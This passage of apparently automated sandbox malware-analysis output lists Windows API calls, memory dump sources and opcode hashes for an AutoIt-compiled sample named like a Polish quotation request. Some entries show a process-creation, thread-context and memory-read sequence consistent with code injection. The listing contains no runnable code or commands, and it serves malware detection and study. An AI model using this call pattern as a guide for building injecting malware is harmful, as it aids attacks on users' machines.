                                                                                                                                                                                                                                                      • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                                                                                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00401C62
                                                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                                                      • String ID: Line:
                                                                                                                                                                                                                                                      • API String ID: 1620655955-1585850449
                                                                                                                                                                                                                                                      • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                                                                                                                                      • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1729 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                      • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                                                                                                                                      • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 192938534-0
                                                                                                                                                                                                                                                      • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                                                                                                                                                      • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 03EDFEF0: Sleep.KERNELBASE(000001F4), ref: 03EDFF01
                                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03EE0158
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2059113429.0000000003EDD000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDD000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3edd000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateFileSleep
                                                                                                                                                                                                                                                      • String ID: 6GYVRO80J099J0R0IEX9D4U
                                                                                                                                                                                                                                                      • API String ID: 2694422964-2036440520
                                                                                                                                                                                                                                                      • Opcode ID: 3be23dc6204308110041a3fe0054ee75bb3b86666c43cc1fa25d93f0195b4bb8
                                                                                                                                                                                                                                                      • Instruction ID: 28752e1f7e94d5a048e32930ec8f91c7fcf6090f642615272ad2dfa5d3829552
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3be23dc6204308110041a3fe0054ee75bb3b86666c43cc1fa25d93f0195b4bb8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83618530D1428CDAEF11DBE4D8547EEBB79AF19304F044199E148BB2C1D7BA1B45CBA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00413AA6
                                                                                                                                                                                                                                                        • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                                                                                                                                                                                        • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                                                                                                                                                                                        • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                                                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2714421763-0
                                                                                                                                                                                                                                                      • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                                                                                                                                                      • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                                                                                                                                                                                        • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                                                                                                                                                                                        • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                                                                                                                                                                                                      • _strcat.LIBCMT ref: 0040F603
                                                                                                                                                                                                                                                        • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                                                                                                                                                                                        • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                                                                                                                                                                                      • String ID: HH
                                                                                                                                                                                                                                                      • API String ID: 1194219731-2761332787
                                                                                                                                                                                                                                                      • Opcode ID: dda62e46bfe726ec08d2da4edb305482c5d49b6a6c5c86b03ff1868783609ec0
                                                                                                                                                                                                                                                      • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dda62e46bfe726ec08d2da4edb305482c5d49b6a6c5c86b03ff1868783609ec0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03EDF71D
                                                                                                                                                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EDF741
                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EDF763
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2059113429.0000000003EDD000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDD000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3edd000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2438371351-0
                                                                                                                                                                                                                                                      • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                                                                                                                                                                                      • Instruction ID: c6067584f5ec2b020ab7c9cb56e4a2307b1650a89d733013e6776d63baeeaeb1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42620C34A14258DBEB24CFA4C850BDEB376EF58704F10A1A9D10DEB390E7759E82CB59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040E202
                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IconNotifyShell__memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 928536360-0
                                                                                                                                                                                                                                                      • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                                                                                                                                                                                      • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                        • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                                                                                                                                        • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                                                                                                                                        • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                                                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1411284514-0
                                                                                                                                                                                                                                                      • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                                                                                                                                      • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                                                                                                                                      • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3677997916-0
                                                                                                                                                                                                                                                      • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                                                                                                                                                      • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00435278
                                                                                                                                                                                                                                                        • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                                                                                                                                        • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                                                                                                                                        • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00435288
                                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00435298
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 680241177-0
                                                                                                                                                                                                                                                      • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                                                                                                                                                      • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __lock_file_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 26237723-0
                                                                                                                                                                                                                                                      • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                                                                                                                                      • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
